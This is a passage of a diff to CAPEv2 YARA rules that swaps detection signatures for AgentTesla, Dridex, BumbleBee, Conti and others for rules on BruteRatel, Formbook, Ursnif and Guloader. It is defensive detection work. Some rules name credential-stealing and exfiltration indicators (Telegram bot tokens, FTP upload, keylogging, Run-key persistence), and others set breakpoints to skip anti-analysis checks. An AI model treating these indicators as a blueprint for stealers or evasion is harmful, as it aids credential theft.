-		$s5 = "bot%telegramapi%" wide
-		$s6 = "KillTorProcess" fullword ascii
-		$s7 = "GetMozilla" ascii
-		$s8 = "torbrowser" wide
-		$s9 = "%chatid%" wide
-		$s10 = "logins" fullword wide
-		$s11 = "credential" fullword wide
-		$s12 = "AccountConfiguration+" wide
-		$s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide
-		$s14 = "set_Lenght" fullword ascii
-		$s15 = "get_Keys" fullword ascii
-		$s16 = "set_AllowAutoRedirect" fullword ascii
-		$s17 = "set_wtqQe" fullword ascii
-		$s18 = "set_UseShellExecute" fullword ascii
-		$s19 = "set_IsBodyHtml" fullword ascii
-		$s20 = "set_FElvMn" fullword ascii
-		$s21 = "set_RedirectStandardOutput" fullword ascii
-		$g1 = "get_Clipboard" fullword ascii
-		$g2 = "get_Keyboard" fullword ascii
-		$g3 = "get_Password" fullword ascii
-		$g4 = "get_CtrlKeyDown" fullword ascii
-		$g5 = "get_ShiftKeyDown" fullword ascii
-		$g6 = "get_AltKeyDown" fullword ascii
-		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
-		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
-		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
-		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
-		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
+		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
+		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $s* ) and 4 of ( $g* ) ) ) ) or ( 2 of ( $m* ) )
+		all of them
 }
-rule CAPE_Agentteslav4 : FILE
+rule CAPE_Bruteratelpacker
 {
 	meta:
-		description = "AgentTesla Payload"
+		description = "BruteRatel Outer Encryption Layer"
 		author = "kevoreilly"
-		id = "a39109ca-84cb-527d-b9c2-d8763fa6e496"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		id = "631083be-7058-590a-a394-984545f42ad7"
+		date = "2024-07-22"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AgentTesla.yar#L113-L126"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0a39036f408728ab312a54ff3354453d171424f57f9a8f3b42af867be3037ca9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/BruteRatel.yar#L14-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "2ccb17efe378d034df34d20d7580c58171d0fd11c18fef6c9a23f1ba238514e6"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "AgentTesla Payload"
-		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
+		tags = ""
+		cape_options = "bp1=$outer*,action1=scan,count=0"
 
 	strings:
-		$decode1 = {(07|FE 0C 01 00) (07|FE 0C 01 00) 8E 69 (17|20 01 00 00 00) 63 8F ?? 00 00 01 25 47 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A D2 61 D2 52}
-		$decode2 = {(07|FE 0C 01 00) (08|FE 0C 02 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (11 07|FE 0C 07 00) 91 (06|FE 0C 00 00) (1A|20 04 00 00 00) 58 4A 61 D2 61 D2 52}
-		$decode3 = {(07|FE 0C 01 00) (11 07|FE 0C 07 00) 8F ?? 00 00 01 25 47 (07|FE 0C 01 00) (08|FE 0C 02 00) 91 61 D2 52}
+		$outer = {83 45 F8 01 81 7D F8 FF 00 00 00 7E ?? 83 45 FC 01 8B 45 FC 3B 45 ?? 7E ?? 48}
+		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
+		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		($outer ) and not ( $inner ) and not ( $date )
 }
-rule CAPE_Tscookie : FILE
+rule CAPE_Bruterateldate
 {
 	meta:
-		description = "TSCookie Payload"
+		description = "BruteRatel Date Check Bypass"
 		author = "kevoreilly"
-		id = "e1efd356-7170-5454-bf40-68927c71816c"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "94dd5cf3-ed59-51d6-92c8-aee73fe2926b"
+		date = "2024-07-22"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/TSCookie.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "0461c7fd14c74646437654f0a63a4a89d4efad620e197a8ca1e8d390618842c3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/BruteRatel.yar#L28-L39"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "88589b2d08aea03565668ff1b9af20b6fe11cda50d867c60db7cb4d1826b0fd7"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "TSCookie Payload"
+		tags = ""
+		cape_options = "clear,bp1=$inner*,action1=scan,bp2=$date+6,action2=skip,count=0"
 
 	strings:
-		$string1 = "http://%s:%d" wide
-		$string2 = "/Default.aspx" wide
-		$string3 = "\\wship6"
+		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
+		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		any of them
 }
-rule CAPE_Dridexloader_1 : FILE
+rule CAPE_Bruteratelconfig
 {
 	meta:
-		description = "Dridex v4 dropper C2 parsing function"
+		description = "BruteRatel Config Extraction"
 		author = "kevoreilly"
-		id = "43bd9631-4611-567c-bee5-d926e060b977"
-		date = "2021-03-10"
-		modified = "2021-03-10"
+		id = "5ae680b0-5ad2-5e82-87f8-b0af4fec18de"
+		date = "2024-07-22"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/DridexLoader.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "20696b1f14539c8ecf21bffc696596040c20b1ee2fcedc173945482c0baca588"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/BruteRatel.yar#L41-L51"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "b1815aafec940ab6c8daafc68ccf294845221ada260de5209dcb7e49ccd061c7"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "DridexLoader Payload"
+		tags = ""
+		cape_options = "clear,br1=$decode,count=0,action0=string:eax,typestring=BruteRatel Config"
 
 	strings:
-		$c2parse_1 = {57 0F 95 C0 89 35 [4] 88 46 04 33 FF 80 3D [4] 00 76 54 8B 04 FD [4] 8D 4D EC 83 65 F4 00 89 45 EC 66 8B 04 FD [4] 66 89 45 F0 8D 45 F8 50}
-		$c2parse_2 = {89 45 00 0F B7 53 04 89 10 0F B6 4B 0C 83 F9 0A 7F 03 8A 53 0C 0F B6 53 0C 85 D2 7E B7 8D 74 24 0C C7 44 24 08 00 00 00 00 8D 04 7F 8D 8C 00}
-		$c2parse_3 = {89 08 66 39 1D [4] A1 [4] 0F 95 C1 88 48 04 80 3D [4] 0A 77 05 A0 [4] 80 3D [4] 00 56 8B F3 76 4E 66 8B 04 F5}
-		$c2parse_4 = {0F B7 C0 89 01 A0 [4] 3C 0A 77 ?? A0 [4] A0 [4] 57 33 FF 84 C0 74 ?? 56 BE}
-		$c2parse_5 = {0F B7 05 [4] 89 02 89 15 [4] 0F B6 15 [4] 83 FA 0A 7F 07 0F B6 05 [4] 0F B6 05 [4] 85 C0}
-		$c2parse_6 = {0F B7 53 ?? 89 10 0F B6 4B ?? 83 F9 0A 7F 03 8A 53 ?? 0F B6 53 ?? 85 D2 7E B9}
+		$decode = {55 57 56 53 48 83 EC ?? 31 C0 48 89 CB 48 89 D7 44 89 C6 44 89 CD 44 39 01 77 ?? 41 8D 48 01 E8 [4] 31 C9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		all of them
 }
-rule CAPE_Bazar : FILE
+rule CAPE_Latrodectus_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
+		description = "Latrodectus export selection"
 		author = "kevoreilly"
-		id = "e042f180-2a82-5c93-9858-77281557dd10"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "7c6f167a-6b76-5509-b164-306d1cd19b0f"
+		date = "2024-02-26"
+		modified = "2024-02-26"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Bazar.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "9375f59b56e47fd0b90b089afdf3be8f16f960038fc625523a2e2d5509ab099d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Latrodectus.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05"
+		logic_hash = "c2c9f23e287253d766425c05eb774f6e07bdcbabc259e04b723a1a87c8b91fbd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Bazar Payload"
+		cape_options = "export=$export"
 
 	strings:
-		$decode = {F7 E9 [0-2] C1 FA 0? 8B C2 C1 E8 1F 03 D0 6B C2 ?? 2B C8}
-		$rsa = {C7 00 52 53 41 33 48 8D 48 09 C7 40 04 00 08 00 00 4C 8D 05 [3] 00 C6 40 08 03 B8 09 00 00 00 [0-3] 48 8D 89 80 00 00 00 41 0F 10 00}
+		$export = {48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 EC 30 4C 8B 05 [4] 33 D2 C7 40 [5] 88 50 ?? 49 63 40 3C 42 8B 8C 00 88 00 00 00 85 C9 0F 84}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Dreambot : FILE
+rule CAPE_Guloaderprecursor : FILE
 {
 	meta:
-		description = "Dreambot Payload"
+		description = "Guloader precursor"
 		author = "kevoreilly"
-		id = "675c2fea-fe48-5afd-9fa1-de919134892f"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "663f89d7-a18b-5b03-a7cb-52444a887fa4"
+		date = "2023-10-02"
+		modified = "2023-10-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Dreambot.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "29c6d648d5d38667c5824c2d20a83a20448c2ae6054ddddb2b2b7f8bdb69f74b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Guloader.yar#L17-L28"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "ea05c352739366a03da302074b01537382ba26f7fd5049004f156e47d284f070"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Dreambot Payload"
+		cape_options = "bp0=$antidbg,action0=scan,hc0=1,count=0"
 
 	strings:
-		$a1 = {53 56 33 F6 33 DB C1 6C 24 0C 02 74 2F 8B 02 85 C0 75 11 83 7C 24 0C 02 76 0A 39 42 04 75 05 39 42 08 74 18 43 8A CB D3 C0 33 C6 33 44 24 10 8B F0 89 32 83 C2 04 FF 4C 24 0C 75 D1 5E 5B C2 08 00}
-		$a2 = {53 33 C9 33 DB C1 6C 24 08 02 74 22 56 8B 02 85 C0 8B F0 74 18 33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 E0 5E 5B C2 08 00}
-		$b1 = "Oct  5 2016"
-		$b2 = ".bss"
+		$antidbg = {39 48 04 (0F 85 [3] ??|75 ??) 39 48 08 (0F 85 [3] ??|75 ??) 39 48 0C (0F 85 [3] ??|75 ??)}
+		$except = {8B 45 08 [0-3] 8B 00 [0-3] 8B 58 18 [0-20] 81 38 05 00 00 C0 0F 85 [4-7] 83 FB 00 (0F 84|74)}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $a* ) ) and ( all of ( $b* ) )
+		2 of them and not uint16( 0 ) == 0x5A4D
 }
-rule CAPE_Bumblebeeshellcode_1
+rule CAPE_Ursnifv3_1
 {
 	meta:
-		description = "BumbleBee Loader 2023"
+		description = "Ursnif Config Extraction"
 		author = "kevoreilly"
-		id = "e04f80d0-3a57-51bc-8a54-639c7291a0d8"
-		date = "2024-10-29"
-		modified = "2024-10-29"
+		id = "4170b638-e51b-59c6-956a-50ff82f629ba"
+		date = "2023-03-23"
+		modified = "2023-03-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BumbleBee.yar#L18-L33"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "d56f8c4e491d0d1b34e396e73750bef9917ca4f708fb6a2681de772a65c13a40"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/UrsnifV3.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "d679546e37ee58087fce75920b2ce4e6d2b9ae55fb1ef80d14ec14309396757c"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "BumbleBeeLoader Payload"
-		packed = "51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656"
+		cape_options = "br0=$crypto32_1-48,action1=dump:ebx::eax,bp2=$crypto32_3+50,action2=dump:ebx::eax,bp3=$crypto32_4+11,action3=dump:eax::ecx,typestring=UrsnifV3 Config,count=1"
+		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
+		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
 
 	strings:
-		$setpath = "setPath"
-		$alloc = {B8 01 00 00 00 48 6B C0 08 48 8D 0D [2] 00 00 48 03 C8 48 8B C1 48 89 [3] 00 00 00 8B 44 [2] 05 FF 0F 00 00 25 00 F0 FF FF 8B C0 48 89}
-		$hook = {48 85 C9 74 20 48 85 D2 74 1B 4C 8B C9 45 85 C0 74 13 48 2B D1 42 8A 04 0A 41 88 01 49 FF C1 41 83 E8 01 75 F0 48 8B C1 C3}
-		$algo = {41 8B C1 C1 E8 0B 0F AF C2 44 3B C0 73 6A 4C 8B [3] 44 8B C8 B8 00 08 00 00 2B C2 C1 E8 05 66 03 C2 8B 94 [2] 00 00 00}
-		$cape_string = "cape_options"
+		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
+		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [4] 8B D8 89 5C 24 1C 85 DB 74 41 F6 46 03 01 74 53 8B 46 10 89 44 24 1C 8B 46 0C 53 03 C7 E8 [4] 59}
+		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4E 10 C6 04 08 00 8B 4D ?? 89 01 8B 46 ?? 8B 4D ?? 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
+		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
 
 	condition:
-		2 of them and not $cape_string
+		any of ( $crypto32* ) and $cpuid
 }
-rule CAPE_Bumblebee2024
+rule CAPE_Formhooka
 {
 	meta:
-		description = "BumbleBee 2024"
-		author = "enzok"
-		id = "ba92b894-912d-593c-acf9-99cb6ad6d61f"
-		date = "2024-10-29"
-		modified = "2024-10-29"
+		description = "Formbook Anti-hook Bypass"
+		author = "kevoreilly"
+		id = "6369de74-99eb-57ae-a315-c15f22effc73"
+		date = "2025-06-13"
+		modified = "2025-06-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BumbleBee.yar#L52-L68"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "db58272c1ba74bc6e6a90bdacf7e8feec94be5da2b5123e0475ce86448f3edb2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Formbook.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "21b8101a7039cfad0e9d49cc1f055bc23a2eb4c973dcda2a81a007e452d77a6d"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "BumbleBee Payload"
-		packed = "a20d56ab2e53b3a599af9904f163bb2e1b2bb7f2c98432519e1fbe87c3867e66"
+		cape_options = "clear,bp0=$remap_ntdll_0,action0=setedx:ntdll,count0=1,bp1=$remap_ntdll_1,action1=setdst:ntdll,count1=1"
+		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
+		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
 
 	strings:
-		$rc4key = {48 [6] 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
-		$botidlgt = {4C 8B C1 B? 4F 00 00 00 48 8D 0D [4] E8 [4] 4C 8B C3 48 8D 0D [4] B? 4F 00 00 00 E8 [4] 4C 8B C3 48 8D 0D [4] B? FF 0F 00 00 E8}
-		$botid = {90 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
-		$port = {4C 89 6D ?? 4C 89 6D ?? 4c 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 05 [4] 44 38 2D [4] 75}
-		$dga1 = {4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8B 1D [4] 48 8D 0D [4] E8 [4] 8B F8}
-		$dga2 = {48 8D 0D [4] E8 [4] 8B F0 4C 89 6D ?? 4C 89 6D ?? 4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 15 [4] 44 38 2D [4] 75}
+		$remap_ntdll_0 = {33 56 04 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
+		$remap_ntdll_1 = {33 56 0C 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
 
 	condition:
-		$rc4key and all of ( $botid* ) and 2 of ( $port , $port , $dga1 , $dga2 )
+		any of them
 }
-rule CAPE_Azorult : FILE
+rule CAPE_Formhookb
 {
 	meta:
-		description = "Azorult Payload"
+		description = "Formbook Anti-hook Bypass"
 		author = "kevoreilly"
-		id = "ca76ec00-001f-56d0-bdbc-9dfd3239fba8"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "71797c14-fa5c-5da3-b99d-71435d6c3069"
+		date = "2025-06-13"
+		modified = "2025-06-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Azorult.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "4691cf48d513d1965416b0cce1b6e19c8f7b393a940afd68b7c6ca8c0d125d90"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Formbook.yar#L16-L30"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "a844652c1f883548d17b08f8ff5d9927f92dabc09ab6600554eab7cf1dd50ccb"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Azorult Payload"
+		tags = ""
+		cape_options = "clear,bp0=$entry,action0=scan,hc0=1,bp1=$new_remap,action1=setdst:ntdll,count1=0,bp2=$code+14,count=0"
+		packed = "08c5f44d57f5ccc285596b3d9921bf7fbbbf7f9a827bb3285a800e4c9faf6731"
 
 	strings:
-		$code1 = {C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 00 00 00 8D 85 80 F5 FF FF 89 47 2C C7 47 30 00 08 00 00 8D 85 80 F1 FF FF 89 47 34 C7 47 38 00 04 00 00 57 68 00 00 00 90}
-		$string1 = "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\")"
+		$decode = {B8 67 66 66 66 F7 E? C1 FA 03 8B ?2 C1 E? 1F 03 ?2}
+		$entry = {55 8B EC 83 EC ?4 53 56 57 [480-520] 8B E5 5D C3}
+		$new_remap = {8B (86 [2] 00 00|46 ??|06) 5F 5E 5B 8B E5 5D C3}
+		$code = {8B 4E 18 50 6A 00 51 57 56 E8 9A 18 00 00 8B 55 10 8B 45 0C 8B 0F 83 C4 1C 52 50 FF D1 5F 5E 5D C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		any of them
 }
-rule CAPE_Blister_1 : FILE
+rule CAPE_Formconfa
 {
 	meta:
-		description = "Blister Loader"
+		description = "Formbook Config Extraction"
 		author = "kevoreilly"
-		id = "525fc600-2afc-5cf6-bf55-4ce0ea264dca"
-		date = "2023-09-20"
-		modified = "2023-09-20"
+		id = "f9c3fc92-e2c8-5968-b0f4-80bd8199b7ca"
+		date = "2025-06-13"
+		modified = "2025-06-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Blister.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
-		hash = "d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802c"
-		logic_hash = "f26d85fdf0eb07e67fe38c43c5f6d024bfb7b2a333cb3411f5cdcff6bf5db12d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Formbook.yar#L32-L44"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "b0aa4cec55a21245d8104380c531dd6cc0fdef64fbefd79616eadfb4e95b2d75"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Blister Loader"
+		tags = ""
+		cape_options = "clear,bp0=$c2,action0=string:rcx+1,bp1=$decoy+67,action1=string:rcx+1,count=0,typestring=Formbook Config"
+		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
 
 	strings:
-		$protect1 = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
-		$protect2 = {48 83 C9 FF 48 8D 55 ?? FF D6 48 8D 87 [2] 00 00 48 8D 4D ?? FF D0}
-		$lock1 = {B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75}
-		$lock2 = {B8 FF FF FF 7F 41 BC 01 00 00 00 89 45 40 F0 FF 4D 40 49 2B C4 75}
-		$decode = {0F BE C0 49 03 CC 41 33 C1 44 69 C8 [4] 41 8B C1 C1 E8 0F 44 33 C8 8A 01 84 C0 75 E1 41 81 F9 [4] 74}
+		$c2 = {44 8B C6 48 8B D3 49 8B CE E8 [4] 44 88 23 41 8B DD 48 8D [2] 66 66 66 0F 1F 84 00 00 00 00 00 BA 8D 00 00 00 41 FF C4}
+		$decoy = {8B D7 0F 1F 44 00 00 0F B6 03 FF C0 48 98 48 03 D8 48 FF CA 75 ?? 44 0F B6 03 48 8D 53 01 48 8D 4C [2] E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		all of them
 }
-rule CAPE_Conti : FILE
+rule CAPE_Formhelper
 {
 	meta:
-		description = "Conti Ransomware"
+		description = "Formbook Config Extraction"
 		author = "kevoreilly"
-		id = "c94aed07-0eaf-5b51-a81e-e1992543673a"
-		date = "2021-03-15"
-		modified = "2021-03-15"
+		id = "88ff1354-1ae7-5380-a586-ef95212d59df"
+		date = "2025-06-13"
+		modified = "2025-06-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Conti.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "c9842f93d012d0189b9c6f10ad558b37ae66226bbb619ad677f6906ccaf0e848"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Formbook.yar#L46-L58"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "77cdfc94aac089c4f2590f4afbab35351fc6e104e67813548c68c59d27019a63"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Conti Payload"
+		tags = ""
+		cape_options = "clear,bp2=$config,action2=scan,count=0"
+		packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1"
 
 	strings:
-		$crypto1 = {8A 07 8D 7F 01 0F B6 C0 B9 ?? 00 00 00 2B C8 6B C1 ?? 99 F7 FE 8D [2] 99 F7 FE 88 ?? FF 83 EB 01 75 DD}
-		$website1 = "https://contirecovery.info" ascii wide
-		$website2 = "https://contirecovery.best" ascii wide
+		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 ?? 33 C0 4C 8B E9 4C 89}
+		$decode = {66 66 66 66 0F 1F 84 00 00 00 00 00 0F B6 41 01 48 FF C9 28 41 01 49 FF C9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		all of them
 }
-rule CAPE_Nitrogenloader
+rule CAPE_Formconfb
 {
 	meta:
-		description = "Nitrogen Loader"
